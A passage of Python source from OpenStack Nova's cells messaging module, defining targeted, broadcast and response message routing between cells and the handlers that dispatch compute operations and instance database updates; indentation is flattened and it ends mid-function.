from nova.cells import utils as cells_utils
from nova import compute
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import vm_states
from nova.consoleauth import rpcapi as consoleauth_rpcapi
from nova import context
from nova.db import base
from nova import exception
from nova.network import model as network_model
from nova.objects import base as objects_base
from nova.objects import instance as instance_obj
from nova.objects import instance_fault as instance_fault_obj
from nova.openstack.common import excutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import rpc
from nova import utils
cell_messaging_opts = [
cfg.IntOpt('max_hop_count',
default=10,
help='Maximum number of hops for cells routing.'),
cfg.StrOpt('scheduler',
default='nova.cells.scheduler.CellsScheduler',
help='Cells scheduler to use')]
CONF = cfg.CONF
CONF.import_opt('name', 'nova.cells.opts', group='cells')
CONF.import_opt('call_timeout', 'nova.cells.opts', group='cells')
CONF.register_opts(cell_messaging_opts, group='cells')
LOG = logging.getLogger(__name__)
# Separator used between cell names for the 'full cell name' and routing
# path.
_PATH_CELL_SEP = cells_utils.PATH_CELL_SEP
def _reverse_path(path):
"""Reverse a path. Used for sending responses upstream."""
path_parts = path.split(_PATH_CELL_SEP)
path_parts.reverse()
return _PATH_CELL_SEP.join(path_parts)
def _response_cell_name_from_path(routing_path, neighbor_only=False):
"""Reverse the routing_path. If we only want to send to our parent,
set neighbor_only to True.
"""
path = _reverse_path(routing_path)
if not neighbor_only or len(path) == 1:
return path
return _PATH_CELL_SEP.join(path.split(_PATH_CELL_SEP)[:2])
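# Illustrative example (cell names are hypothetical): for a request that
# travelled routing_path 'api!region!child', _reverse_path() yields
# 'child!region!api'.  With neighbor_only=True,
# _response_cell_name_from_path() keeps only the first two cells of the
# reversed path -- 'child!region' -- so the response goes just one hop up.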
#
# Message classes.
#
class _BaseMessage(object):
"""Base message class. It defines data that is passed with every
single message through every cell.
Messages are JSON-ified before sending and turned back into a
class instance when being received.
Every message has a unique ID. This is used to route responses
back to callers. In the future, this might be used to detect
receiving the same message more than once.
routing_path is updated on every hop through a cell. The current
cell name is appended to it (cells are separated by
_PATH_CELL_SEP ('!')). This is used to tell if we've reached the
target cell and also to determine the source of a message for
responses by reversing it.
hop_count is incremented and compared against max_hop_count. The
only current usefulness of this is to break out of a routing loop
if someone has a broken config.
fanout means to send to all nova-cells services running in a cell.
This is useful for capacity and capability broadcasting as well
as making sure responses get back to the nova-cells service that
is waiting.
"""
# Override message_type in a subclass
message_type = None
base_attrs_to_json = ['message_type',
'ctxt',
'method_name',
'method_kwargs',
'direction',
'need_response',
'fanout',
'uuid',
'routing_path',
'hop_count',
'max_hop_count']
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, need_response=False, fanout=False, uuid=None,
routing_path=None, hop_count=0, max_hop_count=None,
**kwargs):
self.ctxt = ctxt
self.resp_queue = None
self.msg_runner = msg_runner
self.state_manager = msg_runner.state_manager
# Copy these.
self.base_attrs_to_json = self.base_attrs_to_json[:]
# Normally this would just be CONF.cells.name, but going through
# the msg_runner allows us to stub it more easily.
self.our_path_part = self.msg_runner.our_name
self.uuid = uuid
if self.uuid is None:
self.uuid = uuidutils.generate_uuid()
self.method_name = method_name
self.method_kwargs = method_kwargs
self.direction = direction
self.need_response = need_response
self.fanout = fanout
self.routing_path = routing_path
self.hop_count = hop_count
if max_hop_count is None:
max_hop_count = CONF.cells.max_hop_count
self.max_hop_count = max_hop_count
self.is_broadcast = False
self._append_hop()
# Each sub-class should set this when the message is inited
self.next_hops = []
self.resp_queue = None
self.serializer = objects_base.NovaObjectSerializer()
def __repr__(self):
_dict = self._to_dict()
_dict.pop('method_kwargs')
return "<%s: %s>" % (self.__class__.__name__, _dict)
def _append_hop(self):
"""Add our hop to the routing_path."""
routing_path = (self.routing_path and
self.routing_path + _PATH_CELL_SEP or '')
self.routing_path = routing_path + self.our_path_part
self.hop_count += 1
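    # Worked example (hypothetical cells): a message created in cell 'api'
    # starts with routing_path 'api' and hop_count 1 after _append_hop().
    # When the child cell 'region' processes the same message, _append_hop()
    # extends routing_path to 'api!region' and bumps hop_count to 2.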
def _process_locally(self):
"""Its been determined that we should process this message in this
cell. Go through the MessageRunner to call the appropriate
method for this message. Catch the response and/or exception and
encode it within a Response instance. Return it so the caller
can potentially return it to another cell... or return it to
a caller waiting in this cell.
"""
try:
resp_value = self.msg_runner._process_message_locally(self)
failure = False
except Exception as exc:
resp_value = sys.exc_info()
failure = True
LOG.exception(_("Error processing message locally: %(exc)s"),
{'exc': exc})
return Response(self.routing_path, resp_value, failure)
def _setup_response_queue(self):
"""Shortcut to creating a response queue in the MessageRunner."""
self.resp_queue = self.msg_runner._setup_response_queue(self)
def _cleanup_response_queue(self):
"""Shortcut to deleting a response queue in the MessageRunner."""
if self.resp_queue:
self.msg_runner._cleanup_response_queue(self)
self.resp_queue = None
def _wait_for_json_responses(self, num_responses=1):
"""Wait for response(s) to be put into the eventlet queue. Since
each queue entry actually contains a list of JSON-ified responses,
combine them all into a single list to return.
Destroy the eventlet queue when done.
"""
if not self.resp_queue:
# Source is not actually expecting a response
return
responses = []
wait_time = CONF.cells.call_timeout
try:
for x in xrange(num_responses):
json_responses = self.resp_queue.get(timeout=wait_time)
responses.extend(json_responses)
except queue.Empty:
raise exception.CellTimeout()
finally:
self._cleanup_response_queue()
return responses
def _send_json_responses(self, json_responses, neighbor_only=False,
fanout=False):
"""Send list of responses to this message. Responses passed here
are JSON-ified. Targeted messages have a single response while
Broadcast messages may have multiple responses.
If this cell was the source of the message, these responses will
be returned from self.process().
Otherwise, we will route the response to the source of the
request. If 'neighbor_only' is True, the response will be sent
to the neighbor cell, not the original requester. Broadcast
messages get aggregated at each hop, so neighbor_only will be
True for those messages.
"""
if not self.need_response:
return
if self.source_is_us():
responses = []
for json_response in json_responses:
responses.append(Response.from_json(json_response))
return responses
direction = self.direction == 'up' and 'down' or 'up'
response_kwargs = {'orig_message': self.to_json(),
'responses': json_responses}
target_cell = _response_cell_name_from_path(self.routing_path,
neighbor_only=neighbor_only)
response = self.msg_runner._create_response_message(self.ctxt,
direction, target_cell, self.uuid, response_kwargs,
fanout=fanout)
response.process()
def _send_response(self, response, neighbor_only=False):
"""Send a response to this message. If the source of the
request was ourselves, just return the response. It'll be
passed back to the caller of self.process(). See DocString for
_send_json_responses() as it handles most of the real work for
this method.
'response' is an instance of Response class.
"""
if not self.need_response:
return
if self.source_is_us():
return response
self._send_json_responses([response.to_json()],
neighbor_only=neighbor_only)
def _send_response_from_exception(self, exc_info):
"""Take an exception as returned from sys.exc_info(), encode
it in a Response, and send it.
"""
response = Response(self.routing_path, exc_info, True)
return self._send_response(response)
def _to_dict(self):
"""Convert a message to a dictionary. Only used internally."""
_dict = {}
for key in self.base_attrs_to_json:
_dict[key] = getattr(self, key)
return _dict
def to_json(self):
"""Convert a message into JSON for sending to a sibling cell."""
_dict = self._to_dict()
# Convert context to dict.
_dict['ctxt'] = _dict['ctxt'].to_dict()
# NOTE(comstud): 'method_kwargs' needs special serialization
# because it may contain objects.
method_kwargs = _dict['method_kwargs']
for k, v in method_kwargs.items():
method_kwargs[k] = self.serializer.serialize_entity(self.ctxt, v)
return jsonutils.dumps(_dict)
def source_is_us(self):
"""Did this cell create this message?"""
return self.routing_path == self.our_path_part
def process(self):
"""Process a message. Deal with it locally and/or forward it to a
sibling cell.
Override in a subclass.
"""
raise NotImplementedError()
class _TargetedMessage(_BaseMessage):
"""A targeted message is a message that is destined for a specific
single cell.
'target_cell' can be a full cell name like 'api!child-cell' or it can
be an instance of the CellState class if the target is a neighbor cell.
"""
message_type = 'targeted'
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, target_cell, **kwargs):
super(_TargetedMessage, self).__init__(msg_runner, ctxt,
method_name, method_kwargs, direction, **kwargs)
if isinstance(target_cell, cells_state.CellState):
# Neighbor cell or ourselves. Convert it to a 'full path'.
if target_cell.is_me:
target_cell = self.our_path_part
else:
target_cell = '%s%s%s' % (self.our_path_part,
_PATH_CELL_SEP,
target_cell.name)
self.target_cell = target_cell
self.base_attrs_to_json.append('target_cell')
def _get_next_hop(self):
"""Return the cell name for the next hop. If the next hop is
the current cell, return None.
"""
if self.target_cell == self.routing_path:
return self.state_manager.my_cell_state
target_cell = self.target_cell
routing_path = self.routing_path
current_hops = routing_path.count(_PATH_CELL_SEP)
next_hop_num = current_hops + 1
dest_hops = target_cell.count(_PATH_CELL_SEP)
if dest_hops < current_hops:
reason_args = {'target_cell': target_cell,
'routing_path': routing_path}
reason = _("destination is %(target_cell)s but routing_path "
"is %(routing_path)s") % reason_args
raise exception.CellRoutingInconsistency(reason=reason)
dest_name_parts = target_cell.split(_PATH_CELL_SEP)
if (_PATH_CELL_SEP.join(dest_name_parts[:next_hop_num]) !=
routing_path):
reason_args = {'target_cell': target_cell,
'routing_path': routing_path}
reason = _("destination is %(target_cell)s but routing_path "
"is %(routing_path)s") % reason_args
raise exception.CellRoutingInconsistency(reason=reason)
next_hop_name = dest_name_parts[next_hop_num]
if self.direction == 'up':
next_hop = self.state_manager.get_parent_cell(next_hop_name)
else:
next_hop = self.state_manager.get_child_cell(next_hop_name)
if not next_hop:
cell_type = 'parent' if self.direction == 'up' else 'child'
reason_args = {'cell_type': cell_type,
'target_cell': target_cell}
reason = _("Unknown %(cell_type)s when routing to "
"%(target_cell)s") % reason_args
raise exception.CellRoutingInconsistency(reason=reason)
return next_hop
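    # Worked example (hypothetical cells): target_cell 'api!region!child'
    # with routing_path 'api' gives current_hops=0, next_hop_num=1 and
    # dest_hops=2; the prefix check passes ('api' == 'api'), so
    # next_hop_name is 'region' and, for a 'down' message, we return the
    # child cell state for 'region'.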
def process(self):
"""Process a targeted message. This is called for all cells
that touch this message. If the local cell is the one that
created this message, we reply directly with a Response instance.
If the local cell is not the target, an eventlet queue is created
and we wait for the response to show up via another thread
receiving the Response back.
Responses to targeted messages are routed directly back to the
source. No eventlet queues are created in intermediate hops.
All exceptions for processing the message across the whole
routing path are caught and encoded within the Response and
returned to the caller.
"""
try:
next_hop = self._get_next_hop()
except Exception as exc:
exc_info = sys.exc_info()
LOG.exception(_("Error locating next hop for message: %(exc)s"),
{'exc': exc})
return self._send_response_from_exception(exc_info)
if next_hop.is_me:
# Final destination.
response = self._process_locally()
return self._send_response(response)
# Need to forward via neighbor cell.
if self.need_response and self.source_is_us():
# A response is needed and the source of the message is
# this cell. Create the eventlet queue.
self._setup_response_queue()
wait_for_response = True
else:
wait_for_response = False
try:
# This is inside the try block, so we can encode the
# exception and return it to the caller.
if self.hop_count >= self.max_hop_count:
raise exception.CellMaxHopCountReached(
hop_count=self.hop_count)
next_hop.send_message(self)
except Exception as exc:
exc_info = sys.exc_info()
err_str = _("Failed to send message to cell: %(next_hop)s: "
"%(exc)s")
LOG.exception(err_str, {'exc': exc, 'next_hop': next_hop})
self._cleanup_response_queue()
return self._send_response_from_exception(exc_info)
if wait_for_response:
# Targeted messages only have 1 response.
remote_response = self._wait_for_json_responses()[0]
return Response.from_json(remote_response)
class _BroadcastMessage(_BaseMessage):
"""A broadcast message. This means to call a method in every single
cell going in a certain direction.
"""
message_type = 'broadcast'
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, run_locally=True, **kwargs):
super(_BroadcastMessage, self).__init__(msg_runner, ctxt,
method_name, method_kwargs, direction, **kwargs)
        # The local cell creating this message has the option
        # of processing the message locally or not.
self.run_locally = run_locally
self.is_broadcast = True
def _get_next_hops(self):
"""Set the next hops and return the number of hops. The next
hops may include ourself.
"""
if self.hop_count >= self.max_hop_count:
return []
if self.direction == 'down':
return self.state_manager.get_child_cells()
else:
return self.state_manager.get_parent_cells()
def _send_to_cells(self, target_cells):
"""Send a message to multiple cells."""
for cell in target_cells:
cell.send_message(self)
def _send_json_responses(self, json_responses):
"""Responses to broadcast messages always need to go to the
neighbor cell from which we received this message. That
cell aggregates the responses and makes sure to forward them
to the correct source.
"""
return super(_BroadcastMessage, self)._send_json_responses(
json_responses, neighbor_only=True, fanout=True)
def process(self):
"""Process a broadcast message. This is called for all cells
that touch this message.
The message is sent to all cells in the certain direction and
the creator of this message has the option of whether or not
to process it locally as well.
If responses from all cells are required, each hop creates an
eventlet queue and waits for responses from its immediate
neighbor cells. All responses are then aggregated into a
single list and are returned to the neighbor cell until the
source is reached.
        When the source is reached, a list of Response instances is
        returned to the caller.
All exceptions for processing the message across the whole
routing path are caught and encoded within the Response and
returned to the caller. It is possible to get a mix of
successful responses and failure responses. The caller is
responsible for dealing with this.
"""
try:
next_hops = self._get_next_hops()
except Exception as exc:
exc_info = sys.exc_info()
LOG.exception(_("Error locating next hops for message: %(exc)s"),
{'exc': exc})
return self._send_response_from_exception(exc_info)
# Short circuit if we don't need to respond
if not self.need_response:
if self.run_locally:
self._process_locally()
self._send_to_cells(next_hops)
return
# We'll need to aggregate all of the responses (from ourself
# and our sibling cells) into 1 response
try:
self._setup_response_queue()
self._send_to_cells(next_hops)
except Exception as exc:
# Error just trying to send to cells. Send a single response
# with the failure.
exc_info = sys.exc_info()
LOG.exception(_("Error sending message to next hops: %(exc)s"),
{'exc': exc})
self._cleanup_response_queue()
return self._send_response_from_exception(exc_info)
if self.run_locally:
# Run locally and store the Response.
local_response = self._process_locally()
else:
local_response = None
try:
remote_responses = self._wait_for_json_responses(
num_responses=len(next_hops))
except Exception as exc:
# Error waiting for responses, most likely a timeout.
# Send a single response back with the failure.
exc_info = sys.exc_info()
err_str = _("Error waiting for responses from neighbor cells: "
"%(exc)s")
LOG.exception(err_str, {'exc': exc})
return self._send_response_from_exception(exc_info)
if local_response:
remote_responses.append(local_response.to_json())
return self._send_json_responses(remote_responses)
class _ResponseMessage(_TargetedMessage):
"""A response message is really just a special targeted message,
saying to call 'parse_responses' when we reach the source of a 'call'.
The 'fanout' attribute on this message may be true if we're responding
to a broadcast or if we're about to respond to the source of an
original target message. Because multiple nova-cells services may
be running within a cell, we need to make sure the response gets
back to the correct one, so we have to fanout.
"""
message_type = 'response'
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, target_cell, response_uuid, **kwargs):
super(_ResponseMessage, self).__init__(msg_runner, ctxt,
method_name, method_kwargs, direction, target_cell, **kwargs)
self.response_uuid = response_uuid
self.base_attrs_to_json.append('response_uuid')
def process(self):
"""Process a response. If the target is the local cell, process
the response here. Otherwise, forward it to where it needs to
go.
"""
next_hop = self._get_next_hop()
if next_hop.is_me:
self._process_locally()
return
if self.fanout is False:
# Really there's 1 more hop on each of these below, but
# it doesn't matter for this logic.
target_hops = self.target_cell.count(_PATH_CELL_SEP)
current_hops = self.routing_path.count(_PATH_CELL_SEP)
if current_hops + 1 == target_hops:
# Next hop is the target.. so we must fanout. See
# DocString above.
self.fanout = True
next_hop.send_message(self)
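# Fanout example for responses (hypothetical cells): with target_cell
# 'api!region' (one _PATH_CELL_SEP, so target_hops=1) and routing_path
# 'child' (current_hops=0), current_hops + 1 == target_hops, meaning the
# next hop is the final target -- so fanout is flipped to True to reach
# every nova-cells service waiting in that cell.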
#
# Methods that may be called when processing messages after reaching
# a target cell.
#
class _BaseMessageMethods(base.Base):
"""Base class for defining methods by message types."""
def __init__(self, msg_runner):
super(_BaseMessageMethods, self).__init__()
self.msg_runner = msg_runner
self.state_manager = msg_runner.state_manager
self.compute_api = compute.API()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self.consoleauth_rpcapi = consoleauth_rpcapi.ConsoleAuthAPI()
self.host_api = compute.HostAPI()
def task_log_get_all(self, message, task_name, period_beginning,
period_ending, host, state):
"""Get task logs from the DB. The message could have
directly targeted this cell, or it could have been a broadcast
message.
If 'host' is not None, filter by host.
If 'state' is not None, filter by state.
"""
task_logs = self.db.task_log_get_all(message.ctxt, task_name,
period_beginning,
period_ending,
host=host,
state=state)
return jsonutils.to_primitive(task_logs)
class _ResponseMessageMethods(_BaseMessageMethods):
"""Methods that are called from a ResponseMessage. There's only
1 method (parse_responses) and it is called when the message reaches
the source of a 'call'. All we do is stuff the response into the
eventlet queue to signal the caller that's waiting.
"""
def parse_responses(self, message, orig_message, responses):
self.msg_runner._put_response(message.response_uuid,
responses)
class _TargetedMessageMethods(_BaseMessageMethods):
"""These are the methods that can be called when routing a message
to a specific cell.
"""
def __init__(self, *args, **kwargs):
super(_TargetedMessageMethods, self).__init__(*args, **kwargs)
def build_instances(self, message, build_inst_kwargs):
"""Parent cell told us to schedule new instance creation."""
self.msg_runner.scheduler.build_instances(message, build_inst_kwargs)
def run_compute_api_method(self, message, method_info):
"""Run a method in the compute api class."""
method = method_info['method']
fn = getattr(self.compute_api, method, None)
if not fn:
detail = _("Unknown method '%(method)s' in compute API")
raise exception.CellServiceAPIMethodNotFound(
detail=detail % {'method': method})
args = list(method_info['method_args'])
# 1st arg is instance_uuid that we need to turn into the
# instance object.
instance_uuid = args[0]
try:
instance = self.db.instance_get_by_uuid(message.ctxt,
instance_uuid)
except exception.InstanceNotFound:
with excutils.save_and_reraise_exception():
# Must be a race condition. Let's try to resolve it by
# telling the top level cells that this instance doesn't
# exist.
instance = {'uuid': instance_uuid}
self.msg_runner.instance_destroy_at_top(message.ctxt,
instance)
# FIXME(comstud): This is temporary/transitional until I can
# work out a better way to pass full objects down.
EXPECTS_OBJECTS = ['start', 'stop', 'delete_instance_metadata',
'update_instance_metadata']
if method in EXPECTS_OBJECTS:
inst_obj = instance_obj.Instance()
inst_obj._from_db_object(message.ctxt, inst_obj, instance)
instance = inst_obj
args[0] = instance
return fn(message.ctxt, *args, **method_info['method_kwargs'])
def update_capabilities(self, message, cell_name, capabilities):
"""A child cell told us about their capabilities."""
LOG.debug("Received capabilities from child cell "
"%(cell_name)s: %(capabilities)s",
{'cell_name': cell_name, 'capabilities': capabilities})
self.state_manager.update_cell_capabilities(cell_name,
capabilities)
# Go ahead and update our parents now that a child updated us
self.msg_runner.tell_parents_our_capabilities(message.ctxt)
def update_capacities(self, message, cell_name, capacities):
"""A child cell told us about their capacity."""
LOG.debug("Received capacities from child cell "
"%(cell_name)s: %(capacities)s",
{'cell_name': cell_name, 'capacities': capacities})
self.state_manager.update_cell_capacities(cell_name,
capacities)
# Go ahead and update our parents now that a child updated us
self.msg_runner.tell_parents_our_capacities(message.ctxt)
def announce_capabilities(self, message):
"""A parent cell has told us to send our capabilities, so let's
do so.
"""
self.msg_runner.tell_parents_our_capabilities(message.ctxt)
def announce_capacities(self, message):
"""A parent cell has told us to send our capacity, so let's
do so.
"""
self.msg_runner.tell_parents_our_capacities(message.ctxt)
def service_get_by_compute_host(self, message, host_name):
"""Return the service entry for a compute host."""
service = self.db.service_get_by_compute_host(message.ctxt,
host_name)
return jsonutils.to_primitive(service)
def service_update(self, message, host_name, binary, params_to_update):
"""Used to enable/disable a service. For compute services, setting to
disabled stops new builds arriving on that host.
:param host_name: the name of the host machine that the service is
running
:param binary: The name of the executable that the service runs as
        :param params_to_update: e.g. {'disabled': True}
"""
return jsonutils.to_primitive(
self.host_api.service_update(message.ctxt, host_name, binary,
params_to_update))
def service_delete(self, message, service_id):
"""Deletes the specified service."""
self.host_api.service_delete(message.ctxt, service_id)
def proxy_rpc_to_manager(self, message, host_name, rpc_message,
topic, timeout):
"""Proxy RPC to the given compute topic."""
# Check that the host exists.
self.db.service_get_by_compute_host(message.ctxt, host_name)
topic, _sep, server = topic.partition('.')
cctxt = rpc.get_client(messaging.Target(topic=topic,
server=server or None))
method = rpc_message['method']
kwargs = rpc_message['args']
if message.need_response:
cctxt = cctxt.prepare(timeout=timeout)
return cctxt.call(message.ctxt, method, **kwargs)
else:
cctxt.cast(message.ctxt, method, **kwargs)
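    # Illustrative note: topic.partition('.') splits a server-qualified
    # topic such as 'compute.myhost' into topic='compute' and
    # server='myhost'; a bare topic like 'compute' leaves server as '',
    # which is passed through as None (a topic-wide target).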
def compute_node_get(self, message, compute_id):
"""Get compute node by ID."""
compute_node = self.db.compute_node_get(message.ctxt,
compute_id)
return jsonutils.to_primitive(compute_node)
def actions_get(self, message, instance_uuid):
actions = self.db.actions_get(message.ctxt, instance_uuid)
return jsonutils.to_primitive(actions)
def action_get_by_request_id(self, message, instance_uuid, request_id):
action = self.db.action_get_by_request_id(message.ctxt, instance_uuid,
request_id)
return jsonutils.to_primitive(action)
def action_events_get(self, message, action_id):
action_events = self.db.action_events_get(message.ctxt, action_id)
return jsonutils.to_primitive(action_events)
def validate_console_port(self, message, instance_uuid, console_port,
console_type):
"""Validate console port with child cell compute node."""
# 1st arg is instance_uuid that we need to turn into the
# instance object.
try:
instance = self.db.instance_get_by_uuid(message.ctxt,
instance_uuid)
except exception.InstanceNotFound:
with excutils.save_and_reraise_exception():
# Must be a race condition. Let's try to resolve it by
# telling the top level cells that this instance doesn't
# exist.
instance = {'uuid': instance_uuid}
self.msg_runner.instance_destroy_at_top(message.ctxt,
instance)
return self.compute_rpcapi.validate_console_port(message.ctxt,
instance, console_port, console_type)
def get_migrations(self, message, filters):
return self.compute_api.get_migrations(message.ctxt, filters)
def instance_update_from_api(self, message, instance,
expected_vm_state,
expected_task_state,
admin_state_reset):
"""Update an instance in this cell."""
if not admin_state_reset:
# NOTE(comstud): We don't want to nuke this cell's view
# of vm_state and task_state unless it's a forced reset
# via admin API.
instance.obj_reset_changes(['vm_state', 'task_state'])
# NOTE(alaski): A cell should be authoritative for its system_metadata
# and metadata so we don't want to sync it down from the api.
instance.obj_reset_changes(['metadata', 'system_metadata'])
instance.save(message.ctxt, expected_vm_state=expected_vm_state,
expected_task_state=expected_task_state)
def _call_compute_api_with_obj(self, ctxt, instance, method, *args,
**kwargs):
try:
# NOTE(comstud): We need to refresh the instance from this
# cell's view in the DB.
instance.refresh(ctxt)
except exception.InstanceNotFound:
with excutils.save_and_reraise_exception():
# Must be a race condition. Let's try to resolve it by
# telling the top level cells that this instance doesn't
# exist.
instance = {'uuid': instance.uuid}
self.msg_runner.instance_destroy_at_top(ctxt,
instance)
fn = getattr(self.compute_api, method, None)
return fn(ctxt, instance, *args, **kwargs)
def start_instance(self, message, instance):
"""Start an instance via compute_api.start()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'start')
def stop_instance(self, message, instance):
"""Stop an instance via compute_api.stop()."""
do_cast = not message.need_response
return self._call_compute_api_with_obj(message.ctxt, instance,
'stop', do_cast=do_cast)
def reboot_instance(self, message, instance, reboot_type):
"""Reboot an instance via compute_api.reboot()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'reboot',
reboot_type=reboot_type)
def suspend_instance(self, message, instance):
"""Suspend an instance via compute_api.suspend()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'suspend')
def resume_instance(self, message, instance):
"""Resume an instance via compute_api.suspend()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'resume')
def get_host_uptime(self, message, host_name):
return self.host_api.get_host_uptime(message.ctxt, host_name)
def terminate_instance(self, message, instance):
self._call_compute_api_with_obj(message.ctxt, instance, 'delete')
def soft_delete_instance(self, message, instance):
self._call_compute_api_with_obj(message.ctxt, instance, 'soft_delete')
def pause_instance(self, message, instance):
"""Pause an instance via compute_api.pause()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'pause')
def unpause_instance(self, message, instance):
"""Unpause an instance via compute_api.pause()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'unpause')
def resize_instance(self, message, instance, flavor,
extra_instance_updates):
"""Resize an instance via compute_api.resize()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'resize',
flavor_id=flavor['flavorid'],
**extra_instance_updates)
def live_migrate_instance(self, message, instance, block_migration,
disk_over_commit, host_name):
"""Live migrate an instance via compute_api.live_migrate()."""
self._call_compute_api_with_obj(message.ctxt, instance,
'live_migrate', block_migration,
disk_over_commit, host_name)
def revert_resize(self, message, instance):
"""Revert a resize for an instance in its cell."""
self._call_compute_api_with_obj(message.ctxt, instance,
'revert_resize')
def confirm_resize(self, message, instance):
"""Confirm a resize for an instance in its cell."""
self._call_compute_api_with_obj(message.ctxt, instance,
'confirm_resize')
def reset_network(self, message, instance):
"""Reset networking for an instance in its cell."""
self._call_compute_api_with_obj(message.ctxt, instance,
'reset_network')
def inject_network_info(self, message, instance):
"""Inject networking for an instance in its cell."""
self._call_compute_api_with_obj(message.ctxt, instance,
'inject_network_info')
def snapshot_instance(self, message, instance, image_id):
"""Snapshot an instance in its cell."""
instance.refresh()
instance.task_state = task_states.IMAGE_SNAPSHOT_PENDING
instance.save(expected_task_state=[None])
self.compute_rpcapi.snapshot_instance(message.ctxt,
instance,
image_id)
def backup_instance(self, message, instance, image_id,
backup_type, rotation):
"""Backup an instance in its cell."""
instance.refresh()
instance.task_state = task_states.IMAGE_BACKUP
instance.save(expected_task_state=[None])
self.compute_rpcapi.backup_instance(message.ctxt,
instance,
image_id,
backup_type,
rotation)
def rebuild_instance(self, message, instance, image_href, admin_password,
files_to_inject, preserve_ephemeral, kwargs):
kwargs['preserve_ephemeral'] = preserve_ephemeral
self._call_compute_api_with_obj(message.ctxt, instance, 'rebuild',
image_href, admin_password,
files_to_inject, **kwargs)
class _BroadcastMessageMethods(_BaseMessageMethods):
"""These are the methods that can be called as a part of a broadcast
message.
"""
def _at_the_top(self):
"""Are we the API level?"""
return not self.state_manager.get_parent_cells()
def _apply_expected_states(self, instance_info):
"""To attempt to address out-of-order messages, do some sanity
checking on the VM and task states. Add some requirements for
vm_state and task_state to the instance_update() DB call if
necessary.
"""
expected_vm_state_map = {
# For updates containing 'vm_state' of 'building',
# only allow them to occur if the DB already says
# 'building' or if the vm_state is None. None
# really shouldn't be possible as instances always
# start out in 'building' anyway.. but just in case.
vm_states.BUILDING: [vm_states.BUILDING, None]}
expected_task_state_map = {
# Always allow updates when task_state doesn't change,
# but also make sure we don't set resize/rebuild task
# states for old messages when we've potentially already
# processed the ACTIVE/None messages. Ie, these checks
# will prevent stomping on any ACTIVE/None messages
# we already processed.
task_states.REBUILD_BLOCK_DEVICE_MAPPING:
[task_states.REBUILD_BLOCK_DEVICE_MAPPING,
task_states.REBUILDING],
task_states.REBUILD_SPAWNING:
[task_states.REBUILD_SPAWNING,
task_states.REBUILD_BLOCK_DEVICE_MAPPING,
task_states.REBUILDING],
task_states.RESIZE_MIGRATING:
[task_states.RESIZE_MIGRATING,
task_states.RESIZE_PREP],
task_states.RESIZE_MIGRATED:
[task_states.RESIZE_MIGRATED,
task_states.RESIZE_MIGRATING,
task_states.RESIZE_PREP],
task_states.RESIZE_FINISH:
[task_states.RESIZE_FINISH,
task_states.RESIZE_MIGRATED,
task_states.RESIZE_MIGRATING,
task_states.RESIZE_PREP]}
if 'vm_state' in instance_info:
expected = expected_vm_state_map.get(instance_info['vm_state'])
if expected is not None:
instance_info['expected_vm_state'] = expected
if 'task_state' in instance_info:
expected = expected_task_state_map.get(instance_info['task_state'])
if expected is not None:
instance_info['expected_task_state'] = expected
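    # Worked example: an out-of-order update carrying
    # task_state=RESIZE_MIGRATED gains
    # expected_task_state=[RESIZE_MIGRATED, RESIZE_MIGRATING, RESIZE_PREP],
    # so the later instance_update() only applies while the DB row is
    # still in one of those earlier resize states.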
def instance_update_at_top(self, message, instance, **kwargs):
"""Update an instance in the DB if we're a top level cell."""
if not self._at_the_top():
return
instance_uuid = instance['uuid']
# Remove things that we can't update in the top level cells.
# 'metadata' is only updated in the API cell, so don't overwrite
# it based on what child cells say. Make sure to update
# 'cell_name' based on the routing path.
items_to_remove = ['id', 'security_groups', 'volumes', 'cell_name',
'name', 'metadata']
for key in items_to_remove:
instance.pop(key, None)
instance['cell_name'] = _reverse_path(message.routing_path)
# Fixup info_cache. We'll have to update this separately if
# it exists.
info_cache = instance.pop('info_cache', None)
if info_cache is not None:
info_cache.pop('id', None)
info_cache.pop('instance', None)
if 'system_metadata' in instance:
# Make sure we have the dict form that we need for
# instance_update.
instance['system_metadata'] = utils.instance_sys_meta(instance)
LOG.debug("Got update for instance: %(instance)s",
{'instance': instance}, instance_uuid=instance_uuid)
self._apply_expected_states(instance)
# It's possible due to some weird condition that the instance
# was already set as deleted... so we'll attempt to update
# it with permissions that allows us to read deleted.
with utils.temporary_mutation(message.ctxt, read_deleted="yes"):
try:
self.db.instance_update(message.ctxt, instance_uuid,
instance, update_cells=False)
except exception.NotFound:
# FIXME(comstud): Strange. Need to handle quotas here,
# if we actually want this code to remain..
self.db.instance_create(message.ctxt, instance)
if info_cache:
network_info = info_cache.get('network_info')
if isinstance(network_info, list):
if not isinstance(network_info, network_model.NetworkInfo):
network_info = network_model.NetworkInfo.hydrate(
network_info)
info_cache['network_info'] = network_info.json()
try:
self.db.instance_info_cache_update(
message.ctxt, instance_uuid, info_cache)
except exception.InstanceInfoCacheNotFound:
# Can happen if we try to update a deleted instance's
# network information.
pass
def instance_destroy_at_top(self, message, instance, **kwargs):
"""Destroy an instance from the DB if we're a top level cell."""
if not self._at_the_top():
return
instance_uuid = instance['uuid']
LOG.debug("Got update to delete instance",
instance_uuid=instance_uuid)
try:
self.db.instance_destroy(message.ctxt, instance_uuid,
update_cells=False)
except exception.InstanceNotFound:
pass
def instance_delete_everywhere(self, message, instance, delete_type,
**kwargs):
"""Call compute API delete() or soft_delete() in every cell.
This is used when the API cell doesn't know what cell an instance
belongs to but the instance was requested to be deleted or
soft-deleted. So, we'll run it everywhere.
"""
LOG.debug("Got broadcast to %(delete_type)s delete instance",
{'delete_type': delete_type}, instance=instance)
if delete_type == 'soft':
self.compute_api.soft_delete(message.ctxt, instance)
else:
self.compute_api.delete(message.ctxt, instance)
def instance_fault_create_at_top(self, message, instance_fault, **kwargs):
"""Destroy an instance from the DB if we're a top level cell."""
if not self._at_the_top():
return
items_to_remove = ['id']
for key in items_to_remove:
